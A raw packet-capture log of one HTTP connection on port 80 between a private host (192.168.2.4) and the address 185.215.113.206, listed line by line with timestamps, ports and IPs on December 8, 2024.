Dec 8, 2024 19:52:28.881714106 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.881753922 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.881797075 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.882695913 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.882755995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.882822037 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.882865906 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.883333921 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.883379936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.883441925 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.883486986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.883992910 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.884038925 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:28.884103060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:28.884145975 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.049817085 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.049834013 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.049851894 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.049916029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.050129890 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.050622940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.050678968 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.050723076 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.050765991 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.051464081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.051512957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.051599979 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.051645994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.052248955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.052295923 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.052325964 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.052369118 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.053029060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.053073883 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.053132057 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.053175926 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.053863049 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.053905010 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.053983927 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.054033041 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.054681063 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.054728031 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.054764032 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.054807901 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.055713892 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.055762053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.055819988 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.055862904 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.056363106 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.056380987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.056411028 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.056421995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.057135105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.057182074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.057238102 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.057281971 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.057964087 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.058010101 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.058150053 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.058193922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.058752060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.058798075 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.059035063 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.059083939 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.059567928 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.059614897 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.059642076 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.059684038 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.060355902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.060422897 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.060548067 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.060591936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.061208010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.061253071 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.061412096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.061458111 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.062017918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.062062025 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.062144995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.062190056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.062788010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.062833071 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.062983036 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.063029051 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.063600063 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.063646078 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.063801050 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.063846111 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.064491987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.064538002 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.064625025 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.064668894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.065444946 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.065489054 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.065543890 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.065579891 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.066129923 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.066175938 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.066210032 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.066256046 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.066884995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.066926956 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.067042112 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.067086935 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.067707062 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.067751884 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.067862034 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.067905903 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.068466902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.068514109 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.068587065 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.068630934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.069283962 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.069343090 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.069364071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.069406986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.070116997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.070168018 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.070245028 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.070287943 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.070924997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.070986986 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.071017981 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.071059942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.071788073 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.071834087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.071887016 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.071930885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.072632074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.072676897 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.072735071 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.072778940 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.073406935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.073452950 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.073532104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.073576927 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.074170113 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.074214935 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.074245930 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.074287891 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.075035095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.075079918 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.075161934 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.075207949 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.075890064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.075936079 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.075984955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.076028109 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.076667070 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.076713085 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.076741934 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.076780081 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.077425957 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.077471018 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.077547073 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.077589989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.078320980 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.078365088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.078396082 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.078434944 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.079061031 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.079108000 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.079145908 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.079186916 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.079868078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.079911947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.079916000 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.079948902 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.080702066 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.080743074 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.080790043 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.080830097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.081466913 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.081530094 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.081665039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.081722021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.082298994 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.082341909 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.082367897 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.082410097 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.083157063 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.083201885 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.083287001 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.083328009 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.083918095 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.083961964 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.084048033 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.084090948 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.084736109 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.084780931 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.084866047 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.084909916 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.085589886 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.085633993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.085725069 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.085779905 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.086364985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.086409092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.086497068 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.086541891 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.087208986 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.087239981 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.087260008 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.087274075 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.088002920 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.088044882 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.088169098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.088213921 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.088851929 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.088901043 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.088901997 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.088936090 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.089708090 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.089754105 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.089930058 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.089975119 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.090455055 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.090501070 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.090580940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.090627909 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.091275930 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.091325998 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.091346979 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.091387033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.092099905 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.092144012 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.243309975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.243388891 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.243447065 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.243457079 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.243484020 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.243613958 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.243675947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.244215012 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.244271994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.244405985 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.244447947 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.245114088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.245161057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.245258093 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.245296001 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.245764017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.245775938 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.245815039 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.246566057 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.246612072 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.246706009 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.246751070 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.247541904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.247555017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.247584105 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.247597933 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.248359919 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.248370886 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.248411894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.248423100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.249077082 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.249088049 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.249145985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.249399900 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.249428034 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.249453068 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.249469042 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.250068903 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.250112057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.250170946 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.250216007 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.250870943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.250916004 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.250945091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.250991106 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.251612902 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.251658916 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.251737118 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.251780033 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.252409935 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.252459049 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.252532005 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.252568960 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.255997896 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.256010056 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.256021023 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.256033897 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.256046057 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.256055117 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.256057978 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.256068945 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.256078005 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.256081104 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.256109953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.256119967 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.256696939 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.256750107 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.256840944 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.256886005 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.257554054 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.257595062 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.257709026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.257750034 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.258306026 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.258317947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.258354902 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.259026051 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.259080887 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.259305000 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.259346962 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.259850025 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.259893894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.260044098 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.260086060 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.260891914 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.260904074 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.260951996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.260972977 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.261518002 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.261569023 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.261780024 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.261826038 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.262320995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.262362003 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.262522936 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.262572050 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.263087034 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.263098955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.263138056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.263952017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.264027119 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.264094114 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.264132977 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.264725924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.264774084 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.264877081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.264919043 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.264925957 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.264955044 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.265058994 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.265103102 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.265830040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:29.265872955 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:29.265888929 CET	80	49748	185.215.113.206	192.168.2.4
